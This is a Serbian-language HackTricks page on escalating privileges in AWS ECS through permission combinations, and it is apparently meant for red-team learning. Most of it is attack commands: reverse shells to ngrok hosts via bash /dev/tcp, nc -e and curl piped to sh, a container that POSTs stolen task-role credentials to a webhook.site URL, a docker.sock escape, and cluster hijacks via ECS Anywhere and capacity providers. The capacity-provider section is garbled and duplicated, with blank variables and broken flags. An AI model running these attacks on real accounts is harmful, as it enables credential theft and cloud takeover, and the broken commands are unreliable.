AWS - ECS Privesc

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Pogledajte subscription plans!
• Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.
• Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

ECS

Više informacija o ECS-u u:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

Napadač koji zloupotrebljava dozvole iam:PassRole, ecs:RegisterTaskDefinition i ecs:RunTask u ECS-u može generisati novu task definition sa malicioznim kontejnerom koji ukrade metadata kredencijale i pokrenuti je.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

# Create file container-definition.json
[
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": [
"CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
]
}
]

# Run task definition, uploading the .json file
aws ecs register-task-definition \
--family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 \
--memory 512 \
--requires-compatibilities FARGATE \
--container-definitions file://container-definition.json

# Check the webhook for a response

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potential Impact: Direktan privesc na drugu ECS rolu.

iam:PassRole,ecs:RunTask

Napadač koji ima dozvole iam:PassRole i ecs:RunTask može pokrenuti novi ECS task sa izmenjenim execution role, task role i command kontejnera. Komanda ecs run-task iz CLI sadrži zastavicu --overrides koja omogućava promenu pri izvršavanju executionRoleArn, taskRoleArn i command kontejnera bez menjanja task definition-a.

Navedene IAM role za taskRoleArn i executionRoleArn moraju u svojoj trust policy dozvoliti/omogućiti da ih preuzme servis ecs-tasks.amazonaws.com.

Takođe, napadač treba da zna:

• ime ECS klastera
• VPC Subnet
• Security group (Ako nije navedena security group, koristiće se podrazumevana)
• Task Definition — ime i revizija
• ime kontejnera

aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": <container-name>,
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

U gornjem primeru koda napadač prepisuje samo vrednost taskRoleArn. Međutim, napadač mora imati dozvolu iam:PassRole nad taskRoleArn navedenim u komandi i nad executionRoleArn navedenim u definiciji taska da bi napad bio moguć.

Ako IAM rola koju napadač može proslediti ima dovoljno privilegija da povuče ECR image i pokrene ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer,ecr:BatchGetImage,ecr:GetAuthorizationToken) onda napadač može navesti istu IAM rolu za executionRoleArn i taskRoleArn u ecs run-task komandi.

aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'

Potential Impact: Direktan privesc na bilo koju ECS task role.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

Kao i u prethodnom primeru, napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask dozvole u ECS može generisati novu task definition sa zlonamernim kontejnerom koji krade metadata credentials i pokrenuti je.
Međutim, u ovom slučaju, potreban je container instance da bi se zlonameran task definition izvršio.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Potencijalni uticaj: Direktan privesc na bilo koju ECS ulogu.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Kao i u prethodnom primeru, napadač koji zloupotrebljava iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService ili ecs:CreateService dozvole u ECS-u može generisati novu task definiciju sa malicioznim kontejnerom koji krade metadata credentials i pokrenuti je kreiranjem novog servisa sa najmanje jednim taskom u radu.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Potencijalni uticaj: Direktni privesc na bilo koju ECS ulogu.

iam:PassRole, (ecs:UpdateService|ecs:CreateService)

Zapravo, samo sa tim dozvolama moguće je koristiti overrides da se izvrše proizvoljne komande u kontejneru sa proizvoljnom ulogom koristeći nešto poput:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Potencijalni uticaj: Direktan privesc na bilo koju ECS rolu.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Ovaj scenario je kao prethodni ali bez dozvole iam:PassRole.
Ovo je i dalje zanimljivo jer, ako možete pokrenuti proizvoljan container, čak i bez role, mogli biste pokrenuti privileged container da izvršite escape na node i ukradete EC2 IAM rolu i role drugih ECS containera koji se izvršavaju na node-u.
Možete čak i primorati druge taskove da se pokreću unutar EC2 instance koju kompromitujete kako biste ukrali njihove kredencijale (kao što je objašnjeno u Privesc to node section).

Warning

Ovaj napad je moguć samo ako ECS cluster koristi EC2 instance i ne Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Napadač sa ecs:ExecuteCommand, ecs:DescribeTasks može izvršavati komande unutar pokrenutog container-a i izvući IAM rolu koja mu je pridružena (potrebne su describe dozvole jer su neophodne za pokretanje aws ecs execute-command).
Međutim, da bi se to ostvarilo, container instance mora imati pokrenut ExecuteCommand agent (koji po defaultu nije pokrenut).

Stoga napadač može pokušati:

• Pokušati pokrenuti komandu u svakom pokrenutom containeru

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

Kada imate shell unutar kontejnera, obično možete extract the task role credentials sa task credentials endpoint-a i ponovo ih koristiti van kontejnera:

# Inside the container:
echo "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | jq

# If you want to use them locally, print shell exports:
python3 - <<'PY'
import json, os, urllib.request
u = "http://169.254.170.2" + os.environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
d = json.load(urllib.request.urlopen(u, timeout=2))
print("export AWS_ACCESS_KEY_ID=" + d["AccessKeyId"])
print("export AWS_SECRET_ACCESS_KEY=" + d["SecretAccessKey"])
print("export AWS_SESSION_TOKEN=" + d["Token"])
PY

• Ako ima ecs:RunTask, pokreni task sa aws ecs run-task --enable-execute-command [...]
• Ako ima ecs:StartTask, pokreni task sa aws ecs start-task --enable-execute-command [...]
• Ako ima ecs:CreateService, kreiraj servis sa aws ecs create-service --enable-execute-command [...]
• Ako ima ecs:UpdateService, ažuriraj servis sa aws ecs update-service --enable-execute-command [...]

Možeš naći primere tih opcija u prethodnim ECS privesc sekcijama.

Potential Impact: Privesc na drugu ulogu vezanu za kontejnere.

ssm:StartSession

Pogledaj u ssm privesc page kako možeš zloupotrebiti ovu dozvolu da privesc to ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Pogledaj u ec2 privesc page kako možeš zloupotrebiti ove dozvole da privesc to ECS:

AWS - EC2 Privesc

ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole

Napadač sa ovim dozvolama često može pretvoriti “cluster membership” u obilaženje bezbednosne granice:

• Registruj EC2 instancu pod kontrolom napadača u žrtvin ECS cluster (postajući container instance)
• Podesi prilagođene container instance attributes kako bi zadovoljio placement constraints
• Dozvoli ECS da rasporedi taskove na tu instancu
• Ukradi task role credentials (i sve tajne/podatke unutar kontejnera) iz taska koji se izvršava na tvojoj instanci

High-level workflow:

1. Dobij EC2 instance identity document + signature sa EC2 instance koju kontrolišeš u ciljanom nalogu (na primer preko SSM/SSH):

curl -s http://169.254.169.254/latest/dynamic/instance-identity/document > iidoc.json
curl -s http://169.254.169.254/latest/dynamic/instance-identity/signature > iisig

2. Registrujte ga u ciljni klaster, opciono postavljajući atribute da biste zadovoljili ograničenja postavljanja:

aws ecs register-container-instance \
--cluster "$CLUSTER" \
--instance-identity-document file://iidoc.json \
--instance-identity-document-signature "$(cat iisig)" \
--attributes name=labtarget,value=hijack

3. Potvrdite da se pridružio:

aws ecs list-container-instances --cluster "$CLUSTER"

4. Pokrenite task / ažurirajte service tako da se nešto rasporedi na instance-u, zatim prikupite task role creds iz task-a:

# On the container host:
docker ps
docker exec -it <container-id> sh
curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

Napomene:

• Registracija instance kontejnera koristeći instance identity document/signature implicira da imate pristup EC2 instance-u u ciljnom nalogu (ili ste jednu kompromitovali). Za cross-account “bring your own EC2”, pogledajte ECS Anywhere tehniku na ovoj stranici.
• Ograničenja raspoređivanja često zavise od atributa instance kontejnera. Nabrojite ih koristeći ecs:DescribeServices, ecs:DescribeTaskDefinition, i ecs:DescribeContainerInstances da biste znali koje atribute treba da postavite.

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

Note

TODO: Testirati

Napadač sa dozvolama ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, i ecs:DescribeTaskSets može kreirati zlonamerni task set za postojeću ECS uslugu i ažurirati primarni task set. Ovo napadaču omogućava izvršavanje proizvoljnog koda unutar usluge.

# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Potencijalni uticaj: Izvršavanje proizvoljnog koda u pogođenoj usluzi, što može uticati na njenu funkcionalnost ili dovesti do eksfiltracije osetljivih podataka.

Reference

• https://ruse.tech/blogs/ecs-attack-methods

Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

Napadač sa permisijama za upravljanje ECS capacity provider-ima i ažuriranje servisa može da kreira EC2 Auto Scaling Group koju kontroliše, umota je u ECS Capacity Provider, poveže je sa ciljnim cluster-om i migrira žrtvin servis da koristi tog providera. Tasks će biti zakazani na EC2 instancama pod kontrolom napadača, omogućavajući OS-level pristup za inspekciju containera i krađu task role credentials.

Komande (us-east-1):

• Preduslovi

• Create Launch Template for ECS agent to join target cluster

• Create Auto Scaling Group

• Create Capacity Provider from the ASG

• Associate the Capacity Provider to the cluster (optionally as default)

• Migrate a service to your provider

• Verify tasks land on attacker instances

• Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.

• Cleanup

Potencijalni uticaj: EC2 nodovi pod kontrolom napadača dobijaju victim tasks, omogućavajući OS-level pristup containerima i krađu task IAM role credentials.

export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true
VPC=vpc-18e6ac62
SUBNETS=
AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=
ASG_ARN=
CP_NAME=htcp-8797
aws ecs create-capacity-provider –name  –auto-scaling-group-provider “autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED”
aws ecs put-cluster-capacity-providers –cluster “” –capacity-providers  –default-capacity-provider-strategy capacityProvider=,weight=1
SVC=
Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service –cluster “” –service “” –capacity-provider-strategy capacityProvider=,weight=1 –force-new-deployment
TASK=
CI=
aws ecs describe-container-instances –cluster “” –container-instances “” –query containerInstances[0].ec2InstanceId –output text


Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
Iskoristite ECS Anywhere da registrujete host koji kontroliše napadač kao EXTERNAL container instance u victim ECS cluster-u i pokrenete tasks na tom hostu koristeći privileged task i execution roles. Ovo daje OS-level kontrolu nad mestom izvršavanja tasks (vaš sopstveni računar) i omogućava krađu credential-a/podataka iz tasks i priključenih volumena bez diranja capacity provider-a ili ASG-ova.


Potrebne permisije (primer minimalno):


ecs:CreateCluster (opciono), ecs:RegisterTaskDefinition, ecs:StartTask ili ecs:RunTask


ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation


iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (za ECS Anywhere instance role i task/execution role-ove)


logs:CreateLogGroup/Stream, logs:PutLogEvents (ako se koristi awslogs)


Uticaj: Pokrenite proizvoljne containere sa izabranim taskRoleArn na hostu napadača; eksfiltrirajte task-role credentials sa 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; pristupite bilo kojim volumenima koje su tasks montirali; diskretnije od manipulacije capacity provider-ima/ASG-ovima.


Koraci

Create/identify cluster (us-east-1)

aws ecs create-cluster --cluster-name ht-ecs-anywhere


Kreiraj ECS Anywhere ulogu i SSM aktivaciju (za on-prem/EXTERNAL instancu)

aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)


Postavite host napadača i automatski ga registrujte kao EXTERNAL (na primer: mali AL2 EC2 kao “on‑prem”)


user-data.sh
```bash
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
```

```bash
AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID
```
4) Proveri da li se EXTERNAL container instance pridružio
```bash
aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances  --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external
```
5) Kreirajte task/execution roles, registrujte EXTERNAL task definition i pokrenite ga na attacker hostu
```bash
# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role
task def (EXTERNAL launch)
cat > td-external.json << ‘JSON’
{
“family”: “ht-external”,
“requiresCompatibilities”: [ “EXTERNAL” ],
“networkMode”: “bridge”,
“memory”: “256”,
“cpu”: “128”,
“executionRoleArn”: “arn:aws:iam:::role/ht-ecs-task-exec”,
“taskRoleArn”: “arn:aws:iam:::role/ht-ecs-task-role”,
“containerDefinitions”: [
{“name”:“steal”,“image”:“public.ecr.aws/amazonlinux/amazonlinux:latest”,
“entryPoint”:[“/bin/sh”,“-c”],
“command”:[“REL=$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2$REL; sleep 600”],
“memory”: 128,
“logConfiguration”:{“logDriver”:“awslogs”,“options”:{“awslogs-region”:“us-east-1”,“awslogs-group”:“/ht/ecs/anywhere”,“awslogs-stream-prefix”:“steal”}}
}
]
}
JSON
aws logs create-log-group –log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition –cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances –cluster ht-ecs-anywhere –query ‘containerInstanceArns[0]’ –output text)
aws ecs start-task –cluster ht-ecs-anywhere –task-definition ht-external 
–container-instances $CI
6) Odatle kontrolišete host koji pokreće tasks. Možete čitati task logs (if awslogs) ili direktno exec-ovati na hostu da eksfiltrujete credentials/data iz svojih tasks.



#### Primer komandi (placeholders)




### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)

Napadač sa dozvolama za upravljanje ECS capacity providers i ažuriranje services može kreirati EC2 Auto Scaling Group pod svojom kontrolom, upakovati je kao ECS Capacity Provider, povezati ga sa ciljanim clusterom i migrirati servis žrtve da koristi tog providera. Tasks će potom biti raspoređeni na EC2 instances pod kontrolom napadača, što omogućava OS-level pristup za inspekciju containers i krađu task role credentials.

Commands (us-east-1):

- Preduslovi



- Kreiraj Launch Template da ECS agent može da se pridruži ciljnom clusteru



- Kreiraj Auto Scaling Group



- Kreiraj Capacity Provider iz ASG-a



- Poveži Capacity Provider sa cluster-om (opciono kao podrazumevano)



- Migriraj service da koristi tvog providera



- Proveri da li tasks slete na instance pod kontrolom napadača



- Opcionalno: sa EC2 node-a, pokreni docker exec u target containers i pročitaj http://169.254.170.2 da dobiješ task role credentials.

- Čišćenje



**Mogući uticaj:** EC2 nodes pod kontrolom napadača primaju task-ove žrtve, omogućavajući OS-level pristup container-ima i krađu task IAM role credentials.
> [!TIP]
> Nauči & vežbaj AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Nauči & vežbaj GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Nauči & vežbaj Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Pogledajte [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **pratite** nas na **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hacking tricks slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>